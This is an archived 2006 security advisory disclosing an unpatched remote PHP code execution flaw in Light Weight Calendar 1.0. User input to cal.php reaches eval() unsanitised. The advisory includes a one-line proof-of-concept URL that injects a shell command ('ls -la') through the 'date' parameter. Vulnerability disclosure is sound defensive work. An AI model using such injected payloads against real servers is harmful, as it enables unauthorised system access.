Computer Security

Security Advisory: [eVuln] Light Weight Calendar PHP Code Execution
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  [SA18471] WP-Stats WordPress Plug-in "author" SQL Injection Vulnerability

  [SA18469] Netbula Anyboard "tK" Cross-Site Scripting Vulnerability

  [SA18470] GTP iCommerce Cross-Site Scripting Vulnerabilities

  [SA18472] Widexl Download Tracker "ID" Parameter Cross-Site Scripting

From:Aliaksandr Hartsuyeu <alex_(at)_evuln.com>
Date:16.01.2006
Subject:[eVuln] Light Weight Calendar PHP Code Execution

New eVuln Advisory:
Light Weight Calendar PHP Code Execution
http://evuln.com/vulns/29/summary.html

--------------------Summary----------------

Software: Light Weight Calendar
Sowtware's Web Site: http://sourceforge.net/projects/lwcal/
Versions: 1.0
Critical Level: Dangerous
Type: PHP Code Execution
Class: Remote
Status: Unpatched
Exploit: Available
Solution: Not Available
Discovered by: Aliaksandr Hartsuyeu (alex@evuln.com)
eVuln ID: EV0029

-----------------Description---------------
Vulnerable script: cal.php

Function eval() is called with user-defined parameter which is not properly sanitized. This can be used to execute arbitrary PHP code.

System access is possible.

--------------Exploit----------------------
PHP Code Execution example.

http://host/lwc/index.
php?stam=1928504&date=20050901);%20echo%20(%60ls%20-
la%60&View=month

--------------Solution---------------------
No Patch available.

--------------Credit-----------------------
Original Advisory:
http://evuln.com/vulns/29/summary.html

Discovered by: Aliaksandr Hartsuyeu (alex@evuln.com)
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru